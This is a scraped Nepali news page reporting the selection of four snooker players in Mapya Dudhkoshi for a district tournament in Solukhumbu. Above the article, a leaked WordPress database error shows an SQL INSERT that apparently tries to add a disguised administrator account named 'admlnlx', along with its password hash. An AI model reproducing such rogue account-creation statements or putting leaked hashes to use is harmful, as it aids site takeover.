WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXTvbouFC.XsQ1Mh.tcNEa1.KtuCr2/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 01:14:37', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशीमा स्नुकर खेलाडी छनौट सम्पन्न – Gaule Khabar

माप्य दुधकोशीमा स्नुकर खेलाडी छनौट सम्पन्न

माप्य दुधकोशीमा स्नुकर खेलाडी छनौट सम्पन्न

काठमाण्डौ । सोलुखुम्बुको सल्लेरीमा भदौ ११ देखि १४ सम्म आयोजना हुने जिल्लास्तरिय स्नुकर प्रतियोगीताका लागि माप्य दुधकोशी गाउँपालिकाबाट ४ जना खेलाडी छनौट भएको छन ।

स्टार यूथ क्लबको सोलुखुम्बुको आयोजनामा सम्पन्न स्नुकर खेलमा १८ खेलाडीबाट जीवन राई , विकास राई, अजय राई र मेखराज तामाङ छनौट भएको क्लवका सचिब गौरव राईले जानकारी दिए ।

सोलुदुधकुण्ड नगरपालिका, नेचासल्यान, थुलुङ दुधकोशी, महाकुलुङ र सोताङ गाउपालिकाबाट ४–४ जना खेलाडी छनौट गरिसकिएको छ । अब खुम्बु पासाङ ल्हामू गाउँपालिकामा मात्र खेलाडी छनौट गर्न बाँकी छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका